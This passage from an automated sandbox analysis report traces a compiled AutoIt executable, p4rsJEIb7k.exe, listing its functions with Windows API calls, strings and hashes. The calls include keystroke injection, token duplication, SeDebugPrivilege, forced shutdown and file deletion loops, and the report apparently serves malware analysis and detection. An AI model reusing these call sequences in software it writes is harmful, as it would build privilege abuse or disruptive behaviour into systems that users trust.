                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State$LongProcWindow
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 1562745308-4164748364
                                                                                                                • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                Function 004045E0 Relevance: 46.9, Strings: 35, Instructions: 3193COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                • API String ID: 0-3772701627
                                                                                                                • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                • IsIconic.USER32(?), ref: 004375E1
                                                                                                                • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 3778422247-2988720461
                                                                                                                • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                Function 004461ED Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 227processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 4266742174-1027155976
                                                                                                                • Opcode ID: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                                • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                • Opcode Fuzzy Hash: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                                • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: OpenProcess$CurrentThreadToken$ErrorLast
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 1606813200-2896544425
                                                                                                                • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\p4rsJEIb7k.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 0040D7D6
                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 00431B0E
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 00431B3F
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadWindow$IconName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                                                                                • String ID: @GH$@GH$C:\Users\user\Desktop\p4rsJEIb7k.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                • API String ID: 3436406043-472135737
                                                                                                                • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                                • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                                • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                                                Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                Function 0044BD29 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,?,C:\Users\user\Desktop\p4rsJEIb7k.exe,004A8E80,C:\Users\user\Desktop\p4rsJEIb7k.exe,0040F3D2), ref: 0040FFCA
                                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$CloseCopyDeleteMove$AttributesFirstFullNameNextPathlstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2518010859-1173974218
                                                                                                                • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timetime$Sleep
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 4176159691-3405671355
                                                                                                                • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                Function 00434D50 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 114fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 3827137101-3457252023
                                                                                                                • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                • GetLastError.KERNEL32 ref: 00436504
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
